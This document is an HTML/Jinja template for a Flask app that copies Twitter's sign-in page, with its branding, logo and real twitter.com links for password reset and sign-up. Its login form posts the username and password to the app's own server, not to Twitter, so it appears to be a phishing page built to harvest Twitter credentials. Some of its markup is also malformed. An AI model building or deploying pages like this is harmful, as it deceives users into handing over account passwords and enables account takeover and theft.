<Doctype html!>

<html

<head>


<title>login to Twitter</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body{
font-family:arial;
text-align:center;
}




#google{

width:290px;
height:43px;
border:1px solid grey;
background-color:#00000;
border-radius:50px;
margin-bottom:25px;



}


#apple{

width:290px;
height:43px;
border:1px solid grey;
background-color:#00000;
border-radius:50px;
text-align:center;

}

.input{
width:290px;
height:43px;
margin-top:3px;
margin-bottom:3px;
outline-color:#0095F6;
border-radius:3px;
border:1px solid #ddd;

}

#FP{
color:#0095F6;
font-size:small;
margin-left:130px;
margin-top:15px;
text-decoration:none;

}
#X{

width:55px;
height:55px;

}
.logo{

width:28px;
height:28px;
margin-left:-190px;
margin-top:9px;
}
#text{
margin-top:-26px;

}
#text2{
margin-top:-25px;


}


button{

color:white;
background-color:#1E90FF;
width:100px;
height:40px;
border:2px solid #1E90FF;
border-radius:25px;
font-size:20px;
}


#sign-start{


color:#1E90FF;
text-decoration:none;

}

</style>



</head>


{% block content %}


{% with messages = get_flashed_messages()%}

	{% if messages %}
		{% for msg in messages %}
			<p style="color:red">{{msg}}</p>
		
		{%endfor%}



	{%endif%}




{%endwith%}



<body>
<div id= "head">

<img src = "{{ url_for('static',filename='X.webp')}}" id="X"></div><br><br><br><br>

<!--<div id = "google"><img src="{{ url_for('static',filename='google.png')}}" class="logo"><p id="text2">Sign up with google</div>


<div id = "apple"><img src="{{ url_for('static',filename='apple.png')}}" class="logo">< href="https://appleid.apple.com/auth/authorize?client_id=com.twitter.twitter.siwa&redirect_uri=https%3A%2F%2Ftwitter.com&response_type=code%20id_token&state=5dimK62XEKy2fAgvSQBepEYr7ZoHUfqLFHGw3Fiuu5D&scope=name%20email&response_mode=web_message&frame_id=5dad20c2-babf-4f8f-812c-3b32204ec51b&m=11&v=1.5.5" id="text">sign up with apple</p></div>

-->

<h2>Sign in to Twitter</h2>
<form action="#" method="POST" style="margin-top:30px">

<input type="text" name="username" class="input" placeholder="Phone number,username, or email" required>
<input type="password" name="password" class="input" placeholder="Password" required>

<p id = "FP"><a href="https://twitter.com/i/flow/password_reset?" style="color:black">forgot password?</a></p>

<button id="Login"><b>Log in</b></button> 
</form>

<span id = "account">No account?</span><span><b><a href="https://twitter.com/signup" id="sign-start">Sign up</a></b></span>
</div>





</body>
{% endblock %}
</html>